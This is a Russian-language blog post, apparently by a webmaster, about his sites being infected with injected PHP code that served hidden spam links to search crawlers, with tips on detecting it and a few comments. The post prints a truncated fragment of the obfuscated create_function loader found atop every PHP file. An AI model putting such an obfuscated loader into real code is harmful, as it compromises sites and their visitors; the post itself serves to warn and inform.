Проснувшись однажды утром ипробежавшись по своим проектам я заметил, что посещаемость немного упала, позиции снизились, а 1 сайт вообще не загружался. Полез на ФТП, в админку и в базу. Иобнаружил непонятный файд license.txt в корне всех моих проектов, на одном из хостинг аккаунтов. А затем я увидел это файл в корне всех своих сайтов. Закрались странные подозрения.
В самом файле был какой-то код или хеш, разбираться я не стал. Как выяснилось позже заражены были все сайты, кроме 3 на wordpress, и то я думаю потому что там лежат файлы license.txt от самого движка. Либо у хакера не хватило ума заражать файлы в UTF кодировке. Но суть не в этом.
Я начал открывать все файлы PHP и о чудо! Обнаружил в начале ВСЕХ PHP файлов неизвестнымй мне доселе код.
<?php
$md5 = “1e9619967fab8ca00c9073a6e4a23cea”;
$wp_salt = array(‘d’,”n”,’g’,’s’,’l’,”4″,’i’,”v”,’$’,”_”,”o”,’e’,”f”,”z”,”b”,’;’,’t’,”c”,”a”,”(“,”r”,’)’,’6′);
$wp_add_filter = create_function(‘$’.’v’,$wp_salt[11..многатакогомассива;
$wp_add_filter(‘FZlHEqtIAkS.. многабукаф’);
?>
Было окончательно понятно, что кто-то меня поимел. Поискав по фрагменту кода это чудо текст я наткнулся на пару мессаг на форумах от народа с аналогичными проблемами. Этот чудесный код, как оказалось зарабатывал бабло ребятам. Размещался на каждой странице блок с ссылками на раскручиваемые ими сайты. Юзер зашедший на сайт видел обычный сайт а вот гуглобот видел следующее.
Чтобы узнать, как видит ваши страницы поисковый робот, необходимо добавить сайт в панель вебмастера от Google:
https://www.google.com/webmasters/tools/home?hl=ru
Там заходим в панель управления сайтом. Диагностика -> Просмотреть как Googlebot. Вписываем адрес интересующей страницы (можно оставить поле пустым, чтобы увидеть главную) и жмем “Получить содержание“. После этого нужно дождаться, когда Статус получения станет “Успешно“. Теперь страницу можно посмотреть, нажав на статус. Если вы видите в коде кучу левых ссылок, значит, ваш сайт действительно взломан.
Огромный массив ссылок в конце каждой страницы привратили мой сайт в ссылкопомойку, за это дело я еще из под фильтров не вышел, хотя код и недели не провисел. Бекапы не помогли, так как были все уже заражены, пришлось вылизывать каждый сайт ручками, заодно и пообновлял везде движки и версии форумов. 2 дня ебли и все пхп были вычищены.
Также эти упыри не стесняясь заливали ко мне на хостинг свои шеллы и файлы с ссылками.
Шеллы были зашифрованы таким же образом, как и все мои куски вирусного кода.
3 дня, пока полет нормальный, включил полное логирование, чтобы вычислить ублюдка.
И как идёт логирование?
Очень уж не люблю подобных тварей, любителей поломать чегонить!
Ломай но так, чтоб мне проблем небыло, или сообщи мне про дыру – сделай доброе дело. Короче этих горе хакеров надо вычислять и сажать, а нормальные организации которые занимаются коммерческим взломом, должны работать!!!!
зачем сидеть на вордпресе? есть же масса других движков…